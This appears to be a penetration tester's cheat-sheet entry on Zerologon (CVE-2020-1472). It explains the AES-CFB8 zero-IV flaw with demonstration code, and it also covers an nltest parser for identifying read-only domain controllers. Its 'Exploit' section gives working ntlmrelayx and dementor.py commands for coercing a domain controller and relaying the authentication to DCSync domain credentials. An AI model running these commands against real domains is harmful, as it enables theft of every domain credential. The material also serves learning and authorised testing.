Zerologon

CVE-2020-1472

Check:

$ python3 zerologon_tester.py DC01 10.10.13.38
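Why a single command can detect the bug: NetrServerAuthenticate3 compares a client credential computed as AES-CFB8 over the client challenge with a fixed all-zero IV. Sending an all-zero challenge and an all-zero credential succeeds whenever the first byte of E(session_key, 0^16) is 0x00, which happens for roughly 1 in 256 session keys, so the tester just retries a couple of thousand times. The following is an added illustration of that CFB8 property and is not the tester script itself; it uses real AES if the `cryptography` package is installed and otherwise falls back to a SHA-256-based stand-in block function (an assumption: the zero-IV CFB8 weakness does not depend on the block cipher).

```python
"""Demonstrate the Zerologon CFB8/zero-IV weakness behind ComputeNetlogonCredential."""

import hashlib
import os

BLOCK = 16

try:
    # Real AES block function when the 'cryptography' package is available.
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
        return enc.update(block) + enc.finalize()

    BACKEND = "aes"
except ImportError:
    # Stand-in keyed block function (assumption: any keyed PRF shows the same CFB8 property).
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        return hashlib.sha256(key + block).digest()[:BLOCK]

    BACKEND = "sha256-stand-in"


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: encrypt the 16-byte shift register, XOR its first byte into one
    plaintext byte, then shift the resulting ciphertext byte into the register."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = block_encrypt(key, bytes(register))[0] ^ p
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """MS-NRPC ComputeNetlogonCredential (AES flavour): CFB8 with an all-zero IV
    over the 8-byte challenge. The fixed zero IV is the root cause of Zerologon."""
    return cfb8_encrypt(session_key, b"\x00" * BLOCK, challenge)


def is_weak_key(session_key: bytes) -> bool:
    """Weak for Zerologon: encrypting the zero block yields a zero first byte, so
    the register stays all-zero and every credential byte is 0x00."""
    return block_encrypt(session_key, b"\x00" * BLOCK)[0] == 0


def find_weak_key(start: int = 0) -> bytes:
    """Deterministically scan keys 0, 1, 2, ... (16-byte big-endian) until a weak one appears."""
    i = start
    while True:
        key = i.to_bytes(BLOCK, "big")
        if is_weak_key(key):
            return key
        i += 1


def weak_key_rate(trials: int) -> float:
    """Fraction of random session keys that accept the all-zero credential (about 1/256)."""
    hits = sum(1 for _ in range(trials) if is_weak_key(os.urandom(BLOCK)))
    return hits / trials


if __name__ == "__main__":
    k = find_weak_key()
    print(BACKEND, "weak key:", k.hex(), "credential:", compute_netlogon_credential(k, b"\x00" * 8).hex())
    print("weak key rate over 4096 random keys:", weak_key_rate(4096))
```

The retry loop in a real tester is exactly `weak_key_rate` seen from the attacker's side: each NetrServerReqChallenge/NetrServerAuthenticate3 pair derives a fresh session key, and one of them will be weak within a few hundred attempts on an unpatched DC.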

Exploit:

Exploits that reset the DC machine account password will break the domain! Use this relay technique by @dirkjanm to abuse Zerologon safely (coerce DC02 to authenticate to you, relay it to DC01 and DCSync; the machine password is never changed):

$ ntlmrelayx.py -t dcsync://DC01.megacorp.local -smb2support --no-http-server --no-wcf-server --no-raw-server
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC02.megacorp.local

RODC Notes

Checking whether a DC is an RODC (look at the Flags line: a writable DC advertises WRITABLE, an RODC does not):

PS > nltest.exe /dsgetdc:megacorp.local
PS > nltest.exe /dsgetdc:megacorp.local /server:DC1
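When checking a whole list of DCs it is handy to parse the nltest output instead of eyeballing it. The following is an added example, not part of the original notes; the two nltest outputs embedded in it are constructed samples laid out the way nltest prints its fields, and only the DC/Flags fields are relied on.

```python
"""Parse `nltest /dsgetdc:<domain> [/server:<dc>]` output and flag RODCs."""

import re

# Constructed sample: a writable DC (note WRITABLE and FULL_SECRET in Flags).
SAMPLE_WRITABLE = """\
           DC: \\\\DC1.megacorp.local
      Address: \\\\10.10.13.38
     Dom Name: megacorp.local
  Forest Name: megacorp.local
 Dc Site Name: Default-First-Site-Name
        Flags: PDC GC DS LDAP KDC TIMESERV WRITABLE DNS_DC DNS_DOMAIN DNS_FOREST CLOSE_SITE FULL_SECRET WS
The command completed successfully
"""

# Constructed sample: an RODC (no WRITABLE, no FULL_SECRET).
SAMPLE_RODC = """\
           DC: \\\\RODC1.megacorp.local
      Address: \\\\10.10.13.40
     Dom Name: megacorp.local
  Forest Name: megacorp.local
 Dc Site Name: Branch-Site
        Flags: GC DS LDAP KDC TIMESERV DNS_DC DNS_DOMAIN DNS_FOREST CLOSE_SITE WS
The command completed successfully
"""


def parse_dsgetdc(output: str) -> dict:
    """Turn the 'Name: value' lines into a dict; Flags becomes a set of flag names."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"\s*([A-Za-z ]+?):\s*(.*)$", line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    fields["Flags"] = set(fields.get("Flags", "").split())
    return fields


def dc_name(output: str) -> str:
    """Strip the leading backslashes nltest prints in front of the DC name."""
    return parse_dsgetdc(output).get("DC", "").lstrip("\\")


def is_rodc(output: str) -> bool:
    """An RODC never advertises the WRITABLE flag."""
    return "WRITABLE" not in parse_dsgetdc(output)["Flags"]


if __name__ == "__main__":
    for sample in (SAMPLE_WRITABLE, SAMPLE_RODC):
        print(dc_name(sample), "RODC" if is_rodc(sample) else "writable DC")
```

Feed it the real output with something like `nltest /dsgetdc:megacorp.local /server:DC1 | python3 check_rodc.py` (reading stdin instead of the samples); a DC that comes back as RODC is the one where the STATUS_NO_TRUST_SAM_ACCOUNT behaviour below is to be expected.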

"When a user authenticates to an RODC a check is performed to see if the password is cached. If the password is cached, the RODC will authenticate the user account locally. If the user's password is not cached, then the RODC forwards the authentication request to a writable Domain Controller which in turn authenticates the account and passes the authenticated request back to the RODC. Once the user account is authenticated, the RODC makes another request for the replication of the user's password in a unidirectional replication, providing the account has been configured to allow replication. In order to allow the user password to be cached on the RODC, you could set it up by configuring the Password Replication Policy."

So when authenticating against an RODC whose Password Replication Policy does not allow caching of the machine account's password, the Netlogon authentication may fail with STATUS_NO_TRUST_SAM_ACCOUNT; this is a property of the RODC, not a sign that the DC is patched, so run the check against a writable DC as well.
